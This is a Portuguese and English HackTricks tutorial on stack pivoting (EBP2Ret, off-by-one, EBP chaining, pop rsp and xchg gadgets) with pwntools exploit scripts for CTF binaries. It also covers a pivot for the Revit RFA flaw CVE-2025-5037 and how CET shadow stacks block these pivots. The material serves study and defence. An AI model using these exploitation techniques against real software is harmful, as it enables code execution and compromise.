Stack Pivoting - EBP2Ret - EBP chaining

Reading time: 14 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

InformaçÔes Båsicas

Esta tĂ©cnica explora a capacidade de manipular o Base Pointer (EBP/RBP) para encadear a execução de mĂșltiplas funçÔes atravĂ©s do uso cuidadoso do frame pointer e da sequĂȘncia de instruçÔes leave; ret.

Como lembrete, em x86/x86-64 leave Ă© equivalente a:

mov       rsp, rbp   ; mov esp, ebp on x86
pop       rbp        ; pop ebp on x86
ret

E como o salvo EBP/RBP estĂĄ na stack antes do EIP/RIP salvo, Ă© possĂ­vel controlá‑lo controlando a stack.

Notas

  • On 64-bit, replace EBP→RBP and ESP→RSP. Semantics are the same.
  • Some compilers omit the frame pointer (see “EBP might not be used”). In that case, leave might not appear and this technique won’t work.

EBP2Ret

This technique is particularly useful when you can alter the saved EBP/RBP but have no direct way to change EIP/RIP. It leverages the function epilogue behavior.

If, during fvuln's execution, you manage to inject a fake EBP in the stack that points to an area in memory where your shellcode/ROP chain address is located (plus 8 bytes on amd64 / 4 bytes on x86 to account for the pop), you can indirectly control RIP. As the function returns, leave sets RSP to the crafted location and the subsequent pop rbp decreases RSP, effectively making it point to an address stored by the attacker there. Then ret will use that address.

Note how you need to know 2 addresses: the address where ESP/RSP is going to go, and the value stored at that address that ret will consume.

Construção do Exploit

First you need to know an address where you can write arbitrary data/addresses. RSP will point here and consume the first ret.

Then, you need to choose the address used by ret that will transfer execution. You could use:

  • A valid ONE_GADGET address.
  • The address of system() followed by the appropriate return and arguments (on x86: ret target = &system, then 4 junk bytes, then &"/bin/sh").
  • The address of a jmp esp; gadget (ret2esp) followed by inline shellcode.
  • A ROP chain staged in writable memory.

Remember that before any of these addresses in the controlled area, there must be space for the pop ebp/rbp from leave (8B on amd64, 4B on x86). You can abuse these bytes to set a second fake EBP and keep control after the first call returns.

Off-By-One Exploit

There's a variant used when you can only modify the least significant byte of the saved EBP/RBP. In such a case, the memory location storing the address to jump to with ret must share the first three/five bytes with the original EBP/RBP so a 1-byte overwrite can redirect it. Usually the low byte (offset 0x00) is increased to jump as far as possible within a nearby page/aligned region.

It’s also common to use a RET sled in the stack and put the real ROP chain at the end to make it more probable that the new RSP points inside the sled and the final ROP chain is executed.

EBP Chaining

By placing a controlled address in the saved EBP slot of the stack and a leave; ret gadget in EIP/RIP, it's possible to move ESP/RSP to an attacker-controlled address.

Now RSP is controlled and the next instruction is ret. Place in the controlled memory something like:

  • &(next fake EBP) -> Loaded by pop ebp/rbp from leave.
  • &system() -> Called by ret.
  • &(leave;ret) -> After system ends, moves RSP to the next fake EBP and continues.
  • &("/bin/sh") -> Argument for system.

This way it's possible to chain several fake EBPs to control the flow of the program.

This is like a ret2lib, but more complex and only useful in edge-cases.

AlĂ©m disso, aqui vocĂȘ tem um example of a challenge that uses this technique with a stack leak to call a winning function. This is the final payload from the page:

python
from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16)
log.success(f'Buffer: {hex(buffer)}')

LEAVE_RET = 0x40117c
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229

payload = flat(
0x0,               # rbp (could be the address of another fake RBP)
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0,
elf.sym['winner']
)

payload = payload.ljust(96, b'A')     # pad to 96 (reach saved RBP)

payload += flat(
buffer,         # Load leaked address in RBP
LEAVE_RET       # Use leave to move RSP to the user ROP chain and ret to execute it
)

pause()
p.sendline(payload)
print(p.recvline())

dica de alinhamento amd64: System V ABI requer alinhamento de pilha de 16 bytes nos pontos de chamada. Se sua chain chama funçÔes como system, adicione um alignment gadget (por exemplo, ret, ou sub rsp, 8 ; ret) antes da chamada para manter o alinhamento e evitar crashes por movaps.

EBP pode nĂŁo ser usado

As explained in this post, if a binary is compiled with some optimizations or with frame-pointer omission, the EBP/RBP never controls ESP/RSP. Therefore, any exploit working by controlling EBP/RBP will fail because the prologue/epilogue doesn’t restore from the frame pointer.

  • NĂŁo otimizado / frame pointer usado:
bash
push   %ebp         # save ebp
mov    %esp,%ebp    # set new ebp
sub    $0x100,%esp  # increase stack size
.
.
.
leave               # restore ebp (leave == mov %ebp, %esp; pop %ebp)
ret                 # return
  • Otimizado / frame pointer omitido:
bash
push   %ebx         # save callee-saved register
sub    $0x100,%esp  # increase stack size
.
.
.
add    $0x10c,%esp  # reduce stack size
pop    %ebx         # restore
ret                 # return

No amd64 vocĂȘ frequentemente verĂĄ pop rbp ; ret em vez de leave ; ret, mas se o frame pointer for omitido completamente entĂŁo nĂŁo hĂĄ epĂ­logo baseado em rbp pelo qual pivotar.

Outras maneiras de controlar RSP

pop rsp gadget

In this page vocĂȘ pode encontrar um exemplo usando esta tĂ©cnica. Para esse desafio era necessĂĄrio chamar uma função com 2 argumentos especĂ­ficos, e havia um pop rsp gadget e havia um leak from the stack:

python
# Code from https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp
# This version has added comments

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

p.recvuntil('to: ')
buffer = int(p.recvline(), 16) # Leak from the stack indicating where is the input of the user
log.success(f'Buffer: {hex(buffer)}')

POP_CHAIN = 0x401225       # pop all of: RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229     # pop RSI and R15

# The payload starts
payload = flat(
0,                 # r13
0,                 # r14
0,                 # r15
POP_RDI,
0xdeadbeef,
POP_RSI_R15,
0xdeadc0de,
0x0,               # r15
elf.sym['winner']
)

payload = payload.ljust(104, b'A')     # pad to 104

# Start popping RSP, this moves the stack to the leaked address and
# continues the ROP chain in the prepared payload
payload += flat(
POP_CHAIN,
buffer             # rsp
)

pause()
p.sendline(payload)
print(p.recvline())

xchg , rsp gadget

pop <reg>                <=== return pointer
<reg value>
xchg <reg>, rsp

jmp esp

Confira a técnica ret2esp aqui:

Ret2esp / Ret2reg

Encontrando pivot gadgets rapidamente

Use seu gadget finder favorito para procurar por pivot primitives clĂĄssicas:

  • leave ; ret em funçÔes ou em bibliotecas
  • pop rsp / xchg rax, rsp ; ret
  • add rsp, <imm> ; ret (ou add esp, <imm> ; ret no x86)

Exemplos:

bash
# Ropper
ropper --file ./vuln --search "leave; ret"
ropper --file ./vuln --search "pop rsp"
ropper --file ./vuln --search "xchg rax, rsp ; ret"

# ROPgadget
ROPgadget --binary ./vuln --only "leave|xchg|pop rsp|add rsp"

Classic pivot staging pattern

Uma estratégia robusta de pivot usada em muitos CTFs/exploits:

  1. Use um pequeno overflow inicial para chamar read/recv em uma grande regiĂŁo gravĂĄvel (por exemplo, .bss, heap, ou mapped RW memory) e colocar uma cadeia ROP completa lĂĄ.
  2. Retorne para um pivot gadget (leave ; ret, pop rsp, xchg rax, rsp ; ret) para mover RSP para essa regiĂŁo.
  3. Continue com a cadeia staged (por exemplo, leak libc, chamar mprotect, depois read shellcode, e entĂŁo pular para ele).

Windows: Destructor-loop weird-machine pivots (estudo de caso Revit RFA)

Parsers do lado cliente Ă s vezes implementam loops de destrutores que chamam indiretamente um ponteiro de função derivado de campos de objetos controlados pelo atacante. Se cada iteração oferece exatamente uma chamada indireta (uma “one-gadget” machine), vocĂȘ pode converter isso em um stack pivot confiĂĄvel e entrada ROP.

Observado na desserialização do Autodesk Revit RFA (CVE-2025-5037):

  • Objetos forjados do tipo AString colocam um ponteiro para attacker bytes no offset 0.
  • O loop de destrutores efetivamente executa um gadget por objeto:
asm
rcx = [rbx]              ; object pointer (AString*)
rax = [rcx]              ; pointer to controlled buffer
call qword ptr [rax]     ; execute [rax] once per object

Two practical pivots:

  • Windows 10 (32-bit heap addrs): misaligned “monster gadget” que contĂ©m 8B E0 → mov esp, eax, eventualmente ret, to pivot from the call primitive to a heap-based ROP chain.
  • Windows 11 (full 64-bit addrs): use two objects to drive a constrained weird-machine pivot:
  • Gadget 1: push rax ; pop rbp ; ret (move original rax into rbp)
  • Gadget 2: leave ; ... ; ret (becomes mov rsp, rbp ; pop rbp ; ret), pivoting into the first object’s buffer, where a conventional ROP chain follows.

Tips for Windows x64 after the pivot:

  • Respect the 0x20-byte shadow space and maintain 16-byte alignment before call sites. It’s often convenient to place literals above the return address and use a gadget like lea rcx, [rsp+0x20] ; call rax followed by pop rax ; ret to pass stack addresses without corrupting control flow.
  • Non-ASLR helper modules (if present) provide stable gadget pools and imports such as LoadLibraryW/GetProcAddress to dynamically resolve targets like ucrtbase!system.
  • Creating missing gadgets via a writable thunk: if a promising sequence ends in a call through a writable function pointer (e.g., DLL import thunk or function pointer in .data), overwrite that pointer with a benign single-step like pop rax ; ret. The sequence then behaves like it ended with ret (e.g., mov rdx, rsi ; mov rcx, rdi ; ret), which is invaluable to load Windows x64 arg registers without clobbering others.

For full chain construction and gadget examples, see the reference below.

MitigaçÔes modernas que quebram stack pivoting (CET/Shadow Stack)

CPUs x86 e OSes modernos adotam cada vez mais CET Shadow Stack (SHSTK). Com SHSTK habilitado, ret compara o endereço de retorno na pilha normal com uma shadow stack protegida por hardware; qualquer discrepùncia gera uma falha de Control-Protection e encerra o processo. Portanto, técnicas como EBP2Ret/leave;ret-based pivots irão travar assim que o primeiro ret for executado a partir de uma pivoted stack.

  • For background and deeper details see:

CET & Shadow Stack

  • Quick checks on Linux:
bash
# 1) Is the binary/toolchain CET-marked?
readelf -n ./binary | grep -E 'x86.*(SHSTK|IBT)'

# 2) Is the CPU/kernel capable?
grep -E 'user_shstk|ibt' /proc/cpuinfo

# 3) Is SHSTK active for this process?
grep -E 'x86_Thread_features' /proc/$$/status   # expect: shstk (and possibly wrss)

# 4) In pwndbg (gdb), checksec shows SHSTK/IBT flags
(gdb) checksec
  • Notas para labs/CTF:

  • Algumas distros modernas habilitam SHSTK para binaries compatĂ­veis com CET quando o hardware e o glibc dĂŁo suporte. Para testes controlados em VMs, o SHSTK pode ser desabilitado no sistema inteiro via o parĂąmetro de boot do kernel nousershstk, ou habilitado seletivamente via tunables do glibc durante o startup (veja referĂȘncias). NĂŁo desabilite mitigations em targets de produção.

  • TĂ©cnicas baseadas em JOP/COOP ou SROP ainda podem ser viĂĄveis em alguns targets, mas o SHSTK especificamente quebra pivots baseados em ret.

  • Nota sobre Windows: Windows 10+ expĂ”e user-mode e o Windows 11 adiciona kernel-mode “Hardware-enforced Stack Protection” construĂ­do sobre shadow stacks. Processos compatĂ­veis com CET impedem stack pivoting/ROP em ret; desenvolvedores optam por isso via CETCOMPAT e polĂ­ticas relacionadas (veja referĂȘncia).

ARM64

Em ARM64, os prologue e epilogues das funçÔes não armazenam nem recuperam o registrador SP na stack. Além disso, a instrução RET não retorna para o endereço apontado por SP, mas para o endereço dentro de x30.

Portanto, por padrĂŁo, apenas abusar do epĂ­logo vocĂȘ nĂŁo conseguirĂĄ controlar o registrador SP sobrescrevendo alguns dados dentro da stack. E mesmo que vocĂȘ consiga controlar o SP, ainda precisarĂĄ de uma forma de controlar o registrador x30.

  • prologue
armasm
sub sp, sp, 16
stp x29, x30, [sp]      // [sp] = x29; [sp + 8] = x30
mov x29, sp             // FP points to frame record
  • epilogue
armasm
ldp x29, x30, [sp]      // x29 = [sp]; x30 = [sp + 8]
add sp, sp, 16
ret

caution

A maneira de realizar algo semelhante a stack pivoting em ARM64 seria conseguir controlar o SP (controlando algum registrador cujo valor é passado para o SP ou porque por algum motivo o SP estå tomando seu endereço da stack e temos um overflow) e então abusar do epílogo para carregar o registrador x30 a partir de um SP controlado e dar RET para ele.

TambĂ©m na pĂĄgina a seguir vocĂȘ pode ver o equivalente de Ret2esp in ARM64:

Ret2esp / Ret2reg

References

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks